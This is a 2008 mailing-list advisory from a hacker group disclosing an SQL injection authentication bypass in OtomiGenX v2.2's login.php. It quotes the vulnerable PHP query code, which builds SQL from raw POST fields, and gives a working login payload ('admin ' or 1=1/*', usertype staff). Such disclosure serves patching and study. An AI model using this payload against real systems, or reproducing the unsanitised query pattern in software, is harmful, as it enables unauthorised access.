OtomiGenX v2.2 Ultimate Authentication bypass Vulnerability

hadihadi_zedehal_2006 Mon, 02 Jun 2008 09:17:07 -0700

 

 
######################################################################################


 #                                                                              
      #

 #  ...::::: OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerabilities 
::::....  #           

 
######################################################################################


Virangar Security Team


www.virangar.net

www.virangar.ir

--------

Discoverd By :virangar security team(hadihadi)


special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra


& all virangar members & all hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) 

----------------

                                .::::admin Authentication bypass vuln::::.

//vuln code in login.php:

...

..

...

line 29:


$passwd = md5($_POST[userPassword]);  // md5 hash password


if($_POST[userType] != 'Staff')

{$sql     = "SELECT userID, userName 

             FROM user_account 

             WHERE userAccount='$_POST[userAccount]' AND 

                     userPassword='$passwd' AND 

                     userType='$_POST[userType]' AND isApproved='1'";


}else

$sql      = "SELECT staffID, staffName, staffGroupID 

             FROM staff 

             WHERE staffAccount='$_POST[userAccount]' AND 

                     staffPassword='$passwd'";

...



-----

Exploit:

User Name:admin ' or 1=1/*

Password :[whatever]

usertype:staff

--------------

OtomiGenX v2.2 Ultimate Authentication bypass Vulnerability

Reply via email to